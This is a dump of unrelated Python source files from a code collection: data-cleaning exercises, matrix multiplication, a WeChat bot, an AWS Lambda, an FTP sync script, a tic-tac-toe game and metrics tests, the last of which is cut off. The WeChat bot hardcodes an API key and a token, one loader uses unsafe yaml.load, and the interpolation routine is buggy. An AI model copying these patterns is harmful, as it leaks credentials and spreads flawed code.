self.combo_range.itemData(index)\n async_call(self.ai.set_range, range_, None, self.increase_error_count)\n\n def spin_average_finished(self):\n self.ai.set_averaging(self.spin_average.value())\n","sub_path":"src/brickv/plugin_system/plugins/analog_in/analog_in.py","file_name":"analog_in.py","file_ext":"py","file_size_in_byte":5459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"501082031","text":"\n# coding: utf-8\n\n# Guided Project\n# ----\n# Preparing Data for SQLite\n\n# **Part 1:** Introduction to the Data\n\n# In[50]:\n\nimport pandas as pd\nimport sqlite3 as sql\n\nacademy_awards = pd.read_csv(\"academy_awards.csv\", encoding=\"ISO-8859-1\")\n\nprint(\"PREVIEW OF ROWS\")\nprint(academy_awards.head(5))\nprint('\\n')\nprint(\"SUMMARY OF UNNAMED COLUMN VALUES\")\nprint(academy_awards[\"Unnamed: 5\"].value_counts())\nprint(academy_awards[\"Unnamed: 6\"].value_counts())\nprint(academy_awards[\"Unnamed: 7\"].value_counts())\nprint(academy_awards[\"Unnamed: 8\"].value_counts())\nprint(academy_awards[\"Unnamed: 9\"].value_counts())\nprint(academy_awards[\"Unnamed: 10\"].value_counts())\n\n\n# **Part 2:** Filtering the Data\n\n# In[51]:\n\nacademy_awards[\"Year\"] = academy_awards[\"Year\"].str[0:4]\nacademy_awards[\"Year\"] = academy_awards[\"Year\"].astype(\"int64\")\n\nlater_than_2000 = academy_awards.loc[academy_awards[\"Year\"] > 2000]\n\naward_categories = [\"Actor -- Leading Role\", \"Actor -- Supporting Role\", \"Actress -- Leading Role\", \"Actress -- Supporting Role\"]\nnominations = later_than_2000.loc[later_than_2000[\"Category\"].isin(award_categories)]\n\n\n# **Part 3:** Cleaning Up the Won? 
and Unnamed Columns\n\n# In[52]:\n\nreplace_dict = {\"YES\": 1, \"NO\": 0}\nnew_won = nominations[\"Won?\"].map(replace_dict)\nnominations = nominations.assign(Won=new_won)\n\ncols_to_drop = [\"Won?\", \"Unnamed: 5\", \"Unnamed: 6\", \"Unnamed: 7\", \"Unnamed: 8\", \"Unnamed: 9\", \"Unnamed: 10\"]\nfinal_nominations = nominations.drop(cols_to_drop, axis=1)\nfinal_nominations\n\n\n# **Part 4:** Cleaning Up the Additional Info Column\n\n# In[53]:\n\ndef movie_char(row):\n parts = row.split(\" {'\")\n movie = parts[0]\n character = parts[1][0:len(parts[1])-2]\n vals = [movie, character]\n return vals\n\nadd_list = list(final_nominations[\"Additional Info\"])\nparts_list = [movie_char(row) for row in add_list]\nmovie_list = [x[0] for x in parts_list]\nchar_list = [x[1] for x in parts_list]\n\nfinal_nominations = final_nominations.assign(Movie = movie_list)\nfinal_nominations = final_nominations.assign(Character = char_list)\nfinal_nominations = final_nominations.drop(\"Additional Info\", axis=1)\nfinal_nominations\n\n\n# **Part 5:** Exporting to SQLite\n\n# In[54]:\n\nconn = sql.connect(\"nominations.db\")\nfinal_nominations.to_sql(\"nominations\", conn, index=False, if_exists=\"replace\")\n\n\n# **Part 6:** Verifying in SQL\n\n# In[55]:\n\nc = conn.cursor()\n\nquery1 = \"PRAGMA TABLE_INFO(nominations);\"\nc.execute(query1)\nresults = c.fetchall()\nprint(\"TABLE SCHEMA\")\nprint(results)\nprint('\\n')\n\nquery2 = \"SELECT * FROM nominations LIMIT 10;\"\nc.execute(query2)\nresults = c.fetchall()\nprint(\"FIRST 10 ROWS\")\nprint(results)\n\nconn.close()\n\n\n# **Part 7:** Next Steps\n# \n# The suggestions for additonal work all center around the task of getting the entire dataset (not just recent entries, as we did above) into an SQL table with a consistent format. In order to make that happen, we need to understand how the data formats have changed through time.\n# \n# For now, I'm going to park this project, but I may come back at a later time.\n","sub_path":"dataquest_projects/preparing_data_sqlite/preparing_data_sqlite.py","file_name":"preparing_data_sqlite.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"107196275","text":"# Ex. 1\n\ndef u():\n u = 1.0\n while 1 + u != 1:\n u /= 10\n return u * 10\n\nprint('precision is', u())\n\n# Ex. 2\n\ndef ver_add():\n x = 1.0\n y = u()\n z = u()\n return ((x + y) + z) == (x + (y + z))\n\ndef ver_mul():\n x = 3\n y = 0.7\n z = 0.3\n\n # assoc = False\n # Explanation: \n # (x * y) = 2.099999999\n # ((x * y) * z) = 0.6299999999\n # but \n # (y * z) = 0.21\n # (x * (y * z)) = 0.63 \n return ((x * y) * z) == (x * (y * z))\n\nprint('add asoc?', ver_add())\nprint('mul asoc?', ver_mul())\n\n# Ex. 
3\n\nimport numpy as np\n\ndef create_sample_matrix(n):\n sample = np.zeros(shape=(n,n))\n for i in range(0,n):\n for j in range(0,n):\n sample[i,j] = i * n + j\n return sample\n\ndef strassen_partition(X, n):\n mid = n//2\n X11 = X[0:mid, 0:mid]\n X12 = X[0:mid, mid:]\n X21 = X[mid:, 0:mid]\n X22 = X[mid:, mid:]\n\n return (X11, X12, X21, X22)\n\ndef strassen_result(C11, C12, C21, C22, n):\n result = np.zeros(shape=(n,n))\n\n mid = n//2\n result[0:mid, 0:mid] = C11\n result[0:mid, mid:] = C12\n result[mid:, 0:mid] = C21\n result[mid:, mid:] = C22\n\n return result\n\ndef strassen_mul(A, B, n, n_min):\n if n <= n_min:\n return A.dot(B)\n else:\n A11, A12, A21, A22 = strassen_partition(A, n)\n B11, B12, B21, B22 = strassen_partition(B, n)\n\n P1 = strassen_mul((A11 + A22), (B11 + B22), n//2, n_min)\n P2 = strassen_mul((A21 + A22), B11, n//2, n_min)\n P3 = strassen_mul(A11, (B12 - B22), n//2, n_min)\n P4 = strassen_mul(A22, (B21 - B11), n//2, n_min)\n P5 = strassen_mul((A11 + A12), B22, n//2, n_min)\n P6 = strassen_mul((A21 - A11), (B11 + B12), n//2, n_min)\n P7 = strassen_mul((A12 - A22), (B21 + B22), n//2, n_min)\n\n C11 = P1 + P4 - P5 + P7\n C12 = P3 + P5\n C21 = P2 + P4\n C22 = P1 + P3 - P2 + P6\n \n return strassen_result(C11, C12, C21, C22, n)\n\nsize = 8\n\nA = create_sample_matrix(size)\nB = create_sample_matrix(size)\n\nprint(A, '\\n')\nprint(B, '\\n')\nprint(strassen_mul(A, B, size, 2))","sub_path":"H1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"109502660","text":"# -*- coding: utf-8 -*-\nimport hashlib\nimport web\nimport lxml\nimport time\nimport os\nimport urllib2,json,urllib\nfrom lxml import etree\nimport pylibmc\nimport random\n \nclass WeixinInterface:\n \n def __init__(self):\n self.app_root = os.path.dirname(__file__)\n self.templates_root = os.path.join(self.app_root, 'templates')\n self.render = web.template.render(self.templates_root)\n \n def GET(self):\n #获取输入参数\n data = web.input()\n signature=data.signature\n timestamp=data.timestamp\n nonce=data.nonce\n echostr=data.echostr\n #自己的token\n token=\"tutuxsfly\"\n #字典序排序\n list=[token,timestamp,nonce]\n list.sort()\n sha1=hashlib.sha1()\n map(sha1.update,list)\n hashcode=sha1.hexdigest()\n #sha1加密算法 \n \n #如果是来自微信的请求,则回复echostr\n if hashcode == signature:\n #print \"true\"\n return echostr\n #return '欢迎光临'\n \n \n def POST(self): \n str_xml = web.data()\n xml = etree.fromstring(str_xml)\n #xml = urllib.unquote(xml)\n content=xml.find(\"Content\").text\n mstype=xml.find(\"MsgType\").text \n fromUser=xml.find(\"FromUserName\").text\n toUser=xml.find(\"ToUserName\").text\n mc = pylibmc.Client() #初始化一个memcache实例用来保存用户的操作\n \n \n \n #下面创建一个欢迎消息,通过判断Event类型\n if mstype == \"event\":\n mscontent = xml.find(\"Event\").text\n if mscontent == \"subscribe\":\n replayText = u'''欢迎关注本微信,这个微信是本人业余爱好所建立,也是想一边学习Python一边玩的东西,\n 现在还没有什么功能,只是弄了个翻译与豆瓣图书查询的小工具,你们有什么好的文章也欢迎反馈给我,我会不定期的分享给大家,输入help查看操作指令'''\n return self.render.reply_text(fromUser,toUser,int(time.time()),replayText)\n if mscontent == \"unsubscribe\":\n replayText = u'我现在功能还很简单,知道满足不了您的需求,但是我会慢慢改进,欢迎您以后再来' \n return self.render.reply_text(fromUser,toUser,int(time.time()),replayText)\n if mstype == 'text':\n content=xml.find(\"Content\").text\n \n if content.lower() == 'bye':\n mc.delete(fromUser+'_xhj')\n return self.render.reply_text(fromUser,toUser,int(time.time()),u'您已经跳出了和小黄鸡的交谈中,输入help来显示操作指令')\n if content.lower() == 'xhj':\n 
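# remember in memcache that this user is now chatting with the SimSimi bot; the 'bye' branch above clears the flag\n                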
mc.set(fromUser+'_xhj','xhj')\n return self.render.reply_text(fromUser,toUser,int(time.time()),u'您已经进入与小黄鸡的交谈中,请尽情的蹂躏它吧!输入bye跳出与小黄鸡的交谈')\n if content.lower() == 'm':\n musicList = [\n [r'http://bcs.duapp.com/yangyanxingblog3/music/destiny.mp3','Destiny',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/5days.mp3','5 Days',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/Far%20Away%20%28Album%20Version%29.mp3','Far Away (Album Version)',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/%E5%B0%91%E5%B9%B4%E6%B8%B8.mp3',u'少年游',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/%E8%8F%8A.mp3',u'菊--关喆',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/%E7%A6%BB%E4%B8%8D%E5%BC%80%E4%BD%A0.mp3',u'离不开你',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/%E9%99%8C%E7%94%9F%E4%BA%BA.mp3',u'陌生人',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/%E8%8A%B1%E5%AE%B9%E7%98%A6.mp3',u'花容瘦',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/%E4%B9%98%E5%AE%A2.mp3',u'乘客',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/If%20My%20Heart%20Was%20A%20House.mp3',u'If My Heart Was A House',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/Hello%20Seattle%EF%BC%88Remix%E7%89%88%EF%BC%89.mp3',u'Hello Seattle(Remix版',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/Everybody%20Hurts.mp3',u'Everybody Hurts',u'献给我的宝贝晶晶'] \n ]\n music = random.choice(musicList)\n musicurl = music[0]\n musictitle = music[1]\n musicdes =music[2]\n return self.render.reply_music(fromUser,toUser,int(time.time()),musictitle,musicdes,musicurl)\n \n #读取memcache中的缓存数据\n \n mcxhj = mc.get(fromUser+'_xhj')\n \n if mcxhj =='xhj':\n res = xiaohuangji(content)\n reply_text = res['sentence_resp']\n if u'微信' in reply_text or u'微 信' in reply_text:\n reply_text = u\"小黄鸡脑袋出问题了,请换个问题吧~\"\n return self.render.reply_text(fromUser,toUser,int(time.time()),reply_text) \n \n if content == 'help':\n replayText = u'''1.输入中文或者英文返回对应的英中翻译\n2.输入m随机听一首音乐\n3.输入xhj进入调戏小黄鸡模式'''\n return self.render.reply_text(fromUser,toUser,int(time.time()),replayText)\n elif type(content).__name__ == \"unicode\":\n content = content.encode('UTF-8')\n Nword = youdao(content) \n return self.render.reply_text(fromUser,toUser,int(time.time()),Nword)\n \ndef youdao(word):\n qword = urllib2.quote(word)\n baseurl = r'http://fanyi.youdao.com/openapi.do?keyfrom=yyxweixintranslate&key=1581042900&type=data&doctype=json&version=1.1&q='\n url = baseurl+qword\n resp = urllib2.urlopen(url)\n fanyi = json.loads(resp.read())\n if fanyi['errorCode'] == 0: \n if 'basic' in fanyi.keys():\n trans = u'%s:\\n%s\\n%s\\n网络释义:\\n%s'%(fanyi['query'],''.join(fanyi['translation']),' '.join(fanyi['basic']['explains']),'\\n'.join(fanyi['web'][0]['value']))\n return trans\n else:\n trans = u'%s:\\n基本翻译:%s\\n'%(fanyi['query'],''.join(fanyi['translation'])) \n return trans\n elif fanyi['errorCode'] == 20:\n return u'对不起,要翻译的文本过长'\n elif fanyi['errorCode'] == 30:\n return u'对不起,无法进行有效的翻译'\n elif fanyi['errorCode'] == 40:\n return u'对不起,不支持的语言类型'\n else:\n return u'对不起,您输入的单词%s无法翻译,请检查拼写'% word\n \ndef xiaohuangji(ask):\n ask = ask.encode('UTF-8')\n enask = urllib2.quote(ask)\n send_headers = {\n 'Cookie':''\n }\n baseurl = r'http://www.simsimi.com/func/reqN?lc=zh&ft=0.0&req='\n url = baseurl+enask\n req = urllib2.Request(url,headers=send_headers)\n resp = urllib2.urlopen(req)\n reson = json.loads(resp.read())\n return reson","sub_path":"work for 
2015-2016/py2/shijian-2016/新建文件夹/weix2.py","file_name":"weix2.py","file_ext":"py","file_size_in_byte":7757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"604603677","text":"import yaml\nimport os\n\ncurrent_path = os.path.abspath(os.path.dirname(__file__))\ndefault_conf=current_path + '/../config/merge_handle_rule.yaml'\n\ndef ReadYaml(configPath,root=None):\n\n print(\"get configPath: \"+configPath)\n\n if configPath == None:\n configfile = default_conf\n\n with open(configPath, 'r',encoding='utf8') as f:\n yaml_config = yaml.load(f.read())\n\n if root==None:\n resp = yaml_config\n else:\n resp= yaml_config[root]\n\n return resp\n","sub_path":"common_utils/configHandler.py","file_name":"configHandler.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"471756525","text":"import os, sys, logging\nimport pymysql.cursors\n\nlogger = logging.getLogger()\ndef get_db_connection():\n try:\n return pymysql.connect(os.environ[\"DB_HOST\"],\n user=os.environ[\"DB_USER\"],\n passwd=os.environ[\"DB_PASSWORD\"],\n db=os.environ[\"DB_NAME\"],\n connect_timeout=5)\n except pymysql.MySQLError as e:\n logger.error(\"ERROR: Unexpected error: Could not connect to MySQL instance.\")\n logger.error(e)\n sys.exit() \n\n\ndef lambda_handler(event, context):\n connection = get_db_connection()\n try:\n with connection.cursor() as cursor:\n for event in event[\"Records\"]:\n sql = \"INSERT INTO `files` (`bucket`, `bucket_key`) VALUES (%s, %s)\"\n cursor.execute(sql, (event[\"s3\"][\"bucket\"][\"name\"], event[\"s3\"][\"object\"][\"key\"]))\n connection.commit()\n print(\"Exceuction completed!!!\")\n logger.info(\"Successful!!!\")\n finally:\n connection.close()\n\n\n\n","sub_path":"aws/lambda/python-rds/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"616883214","text":"from sympy import *\n\nx = Symbol('x')\ny = Symbol('y')\n\nxlist = [0, 0.5, 1, 2]\nylist = [0, y, 3, 2]\n\ndef neville(xlist, ylist, point):\n top = 1\n bottom = 1\n L_coef = []\n\n for x_1 in xlist:\n for x_2 in xlist:\n if x_1 != x_2:\n top *= (x - x_2)\n bottom *= (x_1 - x_2)\n L_coef.append(top/bottom)\n \n equation = 0\n for idx in range(len(ylist)):\n equation += L_coef[idx]*ylist[idx]\n\n estimate_poly = equation.subs({x : point})\n return solve(estimate_poly)","sub_path":"neville_method.py","file_name":"neville_method.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"101371014","text":"import _plotly_utils.basevalidators\n\n\nclass LeafValidator(_plotly_utils.basevalidators.CompoundValidator):\n def __init__(self, plotly_name=\"leaf\", parent_name=\"icicle\", **kwargs):\n super(LeafValidator, self).__init__(\n plotly_name=plotly_name,\n parent_name=parent_name,\n data_class_str=kwargs.pop(\"data_class_str\", \"Leaf\"),\n data_docs=kwargs.pop(\n \"data_docs\",\n \"\"\"\n opacity\n Sets the opacity of the leaves. 
With colorscale\n            it is defaulted to 1; otherwise it is defaulted\n            to 0.7\n\"\"\",\n            ),\n            **kwargs,\n        )\n","sub_path":"packages/python/plotly/plotly/validators/icicle/_leaf.py","file_name":"_leaf.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"374578308","text":"from typing import Dict\nfrom cloudrail.knowledge.context.aws.resources.athena.athena_workgroup import AthenaWorkgroup\nfrom cloudrail.knowledge.context.aws.cloudformation.cloudformation_constants import CloudformationResourceType\nfrom cloudrail.knowledge.context.aws.resources_builders.cloudformation.base_cloudformation_builder import BaseCloudformationBuilder\n\n\nclass CloudformationAthenaWorkgroupBuilder(BaseCloudformationBuilder):\n\n    def __init__(self, cfn_by_type_map: Dict[CloudformationResourceType, Dict[str, Dict]]) -> None:\n        super().__init__(CloudformationResourceType.ATHENA_WORKGROUP, cfn_by_type_map)\n\n    def parse_resource(self, cfn_res_attr: dict) -> AthenaWorkgroup:\n        properties: dict = cfn_res_attr['Properties']\n        workgroup_configuration = properties.get('WorkGroupConfiguration', {})\n        result_configuration = workgroup_configuration.get('ResultConfiguration', {})\n        encryption_config = result_configuration.get('EncryptionConfiguration', {})\n        encryption_option = self.get_property(encryption_config, 'EncryptionOption')\n        kms_key_id: str = self.get_property(encryption_config, 'KmsKey')\n\n        return AthenaWorkgroup(self.get_property(properties, 'Name'),\n                               self.get_property(properties, 'State', 'ENABLED'),\n                               encryption_config,\n                               self.get_property(workgroup_configuration, 'EnforceWorkGroupConfiguration', False),\n                               encryption_option,\n                               None,\n                               cfn_res_attr['region'],\n                               cfn_res_attr['account_id'],\n                               kms_key_id)\n","sub_path":"cloudrail/knowledge/context/aws/resources_builders/cloudformation/athena/cloudformation_athena_workgroup_builder.py","file_name":"cloudformation_athena_workgroup_builder.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"530327673","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLucas Fontenla & Victor Hugo - Engenharia 1B\nEP3_JogoDaVelha\n\"\"\"\n#NOTES\n#\"X\" always goes first\nimport numpy as np #numpy is used to build the board matrix\n\nclass Jogo:\n\tdef __init__(self):\n\t\t#players\n\t\tself.jogador1 = str()\n\t\tself.vitorias_jogador1 = int()\n\t\tself.jogador2 = str()\n\t\tself.vitorias_jogador2 = int()\n\t\t#counter for the number of matches\n\t\tself.contador = int()\n\t\tself.contador_max = int()\n\t\t#holds the winner for each of the two game modes\n\t\tself.vencedor = str()\n\t\tself.vencedor_melhor3 = str()\n\n\t\tself.modo_jogo = int()\n\n\t\tself.tabuleiro_virtual = np.zeros([3,3]) #the board is a 3x3 matrix of zeros\n\n\t\tself.jogada = \"X\" #the first move is \"X\"\n\t\tself.proxima_jogada = \"O\"\n\n\tdef recebe_jogadores(self, jogador1, jogador2):\n\t\tself.jogador1 = \"{0}\".format(jogador1) #X\n\t\tself.jogador2 = \"{0}\".format(jogador2) #O\n\n\tdef registra_modo(self, modo):\n\t\tself.modo_jogo = modo\n\n\tdef recebe_jogada(self, posicao_jogada_tupla): #receives a move from the board\n\t\tself.registra_jogada(posicao_jogada_tupla) #record the move in the matrix\n\n\t\tif self.jogada == \"X\": #toggle the mark for the next move\n\t\t\tself.proxima_jogada = \"O\"\n\n\t\telif self.jogada == \"O\":\n\t\t\tself.proxima_jogada = \"X\"\n\n\tdef registra_jogada(self, posicao_jogada_tupla): #writes the move into the board matrix\n\t\tif self.jogada == \"X\":\n\t\t\tvalor = 1\n\t\telif self.jogada == \"O\":\n\t\t\tvalor = 2\n\n\t\tself.tabuleiro_virtual[posicao_jogada_tupla[0]][posicao_jogada_tupla[1]] = valor\n\n\t\tself.jogada = self.proxima_jogada\n\n\t#checks whether there is a winner\n\t#it multiplies the values along every row, column and diagonal. Since X = 1, a line won by \"X\" multiplies to 1;\n\t#the same holds for \"O\", except that its value is 2, so the product is 8. Empty cells are 0, so any product equal\n\t#to 0 means the game is not over yet because a cell is still free. If neither 0, nor 1, nor 8 appears, it is a draw.\n\t
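#Worked example (added): a line holding [1, 1, 1] multiplies to 1, so \"X\" wins;\n\t#[2, 2, 2] multiplies to 8, so \"O\" wins; [1, 2, 0] multiplies to 0: still open.\n\t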
def verifica_ganhador(self):\n\t\tvalores_resultados = list()\n\n\t\tadd_valor_diagonal1 = 1\n\t\tadd_valor_diagonal2 = 1\n\n\t\tfor i in range(0, 3):\n\t\t\tadd_valor_linhas = 1\n\t\t\tadd_valor_colunas = 1\n\n\t\t\tfor j in range(0, 3):\n\t\t\t\tadd_valor_linhas *= self.tabuleiro_virtual[i][j]\n\t\t\t\tadd_valor_colunas *= self.tabuleiro_virtual[j][i]\n\n\t\t\tadd_valor_diagonal1 *= self.tabuleiro_virtual[i][i]\n\t\t\tadd_valor_diagonal2 *= self.tabuleiro_virtual[i][(i*(-1)-1)]\n\n\t\t\tvalores_resultados.append(add_valor_linhas)\n\t\t\tvalores_resultados.append(add_valor_colunas)\n\n\t\tvalores_resultados.append(add_valor_diagonal1)\n\t\tvalores_resultados.append(add_valor_diagonal2)\n\n\t\tif valores_resultados.count(1) > 0:\n\t\t\tself.contador += 1\n\t\t\tself.vencedor = \"X\"\n\t\t\tself.vitorias_jogador1 += 1\n\t\t\treturn 1\n\t\telif valores_resultados.count(8) > 0:\n\t\t\tself.contador += 1\n\t\t\tself.vencedor = \"O\"\n\t\t\tself.vitorias_jogador2 += 1\n\t\t\treturn 2\n\t\telif valores_resultados.count(0) > 0:\n\t\t\treturn -1\n\t\telse:\n\t\t\tself.vencedor = 0\n\t\t\tself.contador += 1\n\t\t\treturn 0\n\n\tdef limpa_jogadas(self): #resets the whole board\n\t\tif self.vencedor == \"X\":\n\t\t\tself.jogada = \"X\"\n\t\t\tself.proxima_jogada = \"O\"\n\n\t\telif self.vencedor == \"O\":\n\t\t\tself.jogada = \"O\"\n\t\t\tself.proxima_jogada = \"X\"\n\n\t\telif self.vencedor == -1: \n\t\t\tself.jogada = self.proxima_jogada\n\t\t\tif self.jogada == \"X\":\n\t\t\t\tself.proxima_jogada = \"O\"\n\t\t\telse:\n\t\t\t\tself.proxima_jogada = \"X\"\n\n\t\tself.tabuleiro_virtual = np.zeros([3,3])\n\n\tdef verifica_modo(self):\n\t\tcontador_max = 3\n\n\t\tif self.vitorias_jogador1 > self.vitorias_jogador2:\n\t\t\tself.vencedor_melhor3 = \"Vencedor(a) {0}\".format(self.jogador1)\n\t\telif self.vitorias_jogador1 < self.vitorias_jogador2:\n\t\t\tself.vencedor_melhor3 = \"Vencedor(a) {0}\".format(self.jogador2)\n\t\telse:\n\t\t\tself.vencedor_melhor3 = \"Empate\"\n\n\t\tif self.modo_jogo == 1:\n\t\t\tif self.vitorias_jogador1 == 2 or self.vitorias_jogador2 == 2 and self.contador == 2:\n\t\t\t\tself.contador = 0\n\t\t\t\tself.vitorias_jogador1 = self.vitorias_jogador2 = 0\n\t\t\t\treturn -1\n\t\t\telif self.contador == contador_max:\n\t\t\t\tself.contador = 0\n\t\t\t\tself.vitorias_jogador1 = self.vitorias_jogador2 = 0\n\t\t\t\treturn -1\n\t\t\telse:\n\t\t\t\treturn 1\n\n\t\treturn 0","sub_path":"Desenvolvimentos extras/Jogo_da_Velha_extra_por_Lucas_Fontenla.py","file_name":"Jogo_da_Velha_extra_por_Lucas_Fontenla.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"103639252","text":"#Importing Adafruit_CharLCD library and Configuring 
LCD\nimport Adafruit_CharLCD as LCD\nlcd = LCD.Adafruit_CharLCD(27,22,25,24,23,18,16,2,4)\n\n#Importing other things like FTP and datetime tags\nimport ftplib\nfrom datetime import datetime\nimport sys, time, json, os, os.path\n\n#Loading config.json file\nif (os.path.isfile('config.json') == True):\n cfgfile = open('config.json','r')\n config = json.load(cfgfile)\n cfgfile.close()\nelse: #If there is no config, ask for info\n server = raw_input(\"Server ip: \")\n username = raw_input(\"Username: \")\n password = raw_input(\"Password: \")\n directory = raw_input(\"Directory: \")\n debug = raw_input(\"Debug Output(y/n)?:\")\n config = {'server':server,\n 'username':username,\n 'password':password,\n 'directory':directory,\n 'debug':debug}\n cfgfile = open('config.json','w')\n json.dump(config,cfgfile)\n cfgfile.close()\n\n#Functions:\ndef genFileCache():\n cache = list(os.listdir(config['directory']))\n return cache\n\ndef debug(text):\n if (config['debug'] == 'y'):\n print(text)\n\ndef disp(text, delay=None):\n lcd.clear()\n lcd.message(text)\n if (delay != None):\n time.sleep(delay)\n\ndef status(message):\n lcd.clear()\n lcd.message(\" \" + datetime.now().strftime('%b %d %H:%M') + \"\\n\" + message)\n\n\n#Declaring FTP\nftp = ftplib.FTP(config['server'])\n\ntry:\n ftp.login(config['username'],config['password'])\n debug(\"Login Successful to \" + config['server'])\n disp(\"Connected to:\\n\" + config['server'],1)\nexcept ftplib.all_errors:\n debug(\"Cannot connect to \" + config['server'])\n disp(\"Connection Error\\n\" + config['server'],1)\n status(\"Connection Error\")\n sys.exit()\n\nlocalfiles = list(genFileCache()) #Declares localfiles as filelist \nremotefiles = ftp.nlst() #Getting filelist from server \n#Checking what server has more than local, and queuing to download\ndownloadList = list(set(remotefiles) - set(localfiles))\n\nif (len(downloadList) == 0):\n debug(\"All files up to date, exiting...\")\n disp(\"All files are\\nup to date!\",2)\n status(\" All Synced\")\n sys.exit()\n\nitemCount = len(downloadList) #Total number of items to be downloaded\nconnFailCount = 0 #Will be used in except block to not continiously try\n #connecting to server\n\nlcd.blink(True) #To show activity\nfor i in range(itemCount):\n try:\n fileName = downloadList[i]\n currentCount = i + 1 #i will start with 0, so this is for humans.\n debug(str(currentCount) + \"/\" + str(itemCount) + \" Downloading \" + fileName)\n disp(str(currentCount)+\"/\"+str(itemCount)+'\\nDownloading ')\n ftp.retrbinary('RETR ' + fileName, open(config['directory'] + fileName,'wb').write)\n except:\n disp(\" DOWNLOAD\\n FAILED\",2)\n if connFailCount >= 3:\n break\n else:\n connFailCount += 1\n\nlcd.blink(False)\ndisp(\" Syncing...\")\nlocalfiles = list(genFileCache())\ndownloadList = list(set(remotefiles) - set(localfiles))\nif (connFailCount >= 3):\n disp(\" Connection\\n Failed\")\n status(\" Conn. 
Failed\")\nelif (len(downloadList) > 0):\n disp(str(len(downloadList)) + \" FILES\\n NOT DOWNLOADED\",3)\n status(\" Some Issues...\")\nelif (len(downloadList) == 0):\n status(\" All Synced\")\nelse:\n status(\" Unknown Issue?\")","sub_path":"PiFtp2.py","file_name":"PiFtp2.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"305742847","text":"\"\"\"Tests src/common/metrics.py\"\"\"\nimport os\nimport pytest\nfrom unittest.mock import Mock, patch\nimport time\nimport platform\n\nfrom common.metrics import MetricsLogger\n\n@patch('mlflow.start_run')\ndef test_unique_mlflow_initialization(mlflow_start_run_mock):\n \"\"\" Tests MetricsLogger() unique initialization of mlflow\"\"\"\n metrics_logger = MetricsLogger()\n metrics_logger_2 = MetricsLogger()\n mlflow_start_run_mock.assert_called_once()\n\n\n@patch('mlflow.log_metric')\ndef test_metrics_logger_log_metric(mlflow_log_metric_mock):\n \"\"\" Tests MetricsLogger().log_metric() \"\"\"\n metrics_logger = MetricsLogger()\n\n metrics_logger.log_metric(\"foo\", \"bar\")\n mlflow_log_metric_mock.assert_called_with(\n \"foo\", \"bar\"\n )\n\n\n@patch('mlflow.log_metric')\ndef test_metrics_logger_log_metric_too_long(mlflow_log_metric_mock):\n \"\"\" Tests MetricsLogger().log_metric() \"\"\"\n metrics_logger = MetricsLogger()\n\n metric_key = \"x\" * 250\n assert len(metric_key), 250\n\n short_metric_key = \"x\" * 50\n assert len(short_metric_key), 50\n\n metrics_logger.log_metric(\n metric_key, \"bar\"\n )\n mlflow_log_metric_mock.assert_called_with(\n short_metric_key, \"bar\"\n )\n\n\n@patch('mlflow.set_tags')\ndef test_metrics_logger_set_properties(mlflow_set_tags_mock):\n \"\"\" Tests MetricsLogger().set_properties() \"\"\"\n metrics_logger = MetricsLogger()\n\n metrics_logger.set_properties(\n key1 = \"foo\",\n key2 = 0.45\n )\n mlflow_set_tags_mock.assert_called_with(\n { 'key1' : \"foo\", 'key2' : 0.45 }\n )\n\n\n@patch('mlflow.set_tags')\ndef test_metrics_logger_set_platform_properties(mlflow_set_tags_mock):\n \"\"\" Tests MetricsLogger().set_properties() \"\"\"\n metrics_logger = MetricsLogger()\n\n platform_properties = {\n \"machine\":platform.machine(),\n \"processor\":platform.processor(),\n \"system\":platform.system(),\n \"system_version\":platform.version(),\n \"cpu_count\":os.cpu_count()\n }\n metrics_logger.set_platform_properties()\n\n mlflow_set_tags_mock.assert_called_with(\n platform_properties\n )\n\n@patch('mlflow.set_tags')\ndef test_metrics_logger_set_properties_from_json(mlflow_set_tags_mock):\n \"\"\" Tests MetricsLogger().set_properties_from_json() \"\"\"\n metrics_logger = MetricsLogger()\n\n metrics_logger.set_properties_from_json(\n \"{ \\\"key1\\\" : \\\"foo\\\", \\\"key2\\\" : 0.45 }\"\n )\n mlflow_set_tags_mock.assert_called_with(\n { 'key1' : \"foo\", 'key2' : '0.45' }\n )\n\n # test failure during json parsing\n with pytest.raises(ValueError) as exc_info:\n metrics_logger.set_properties_from_json(\n 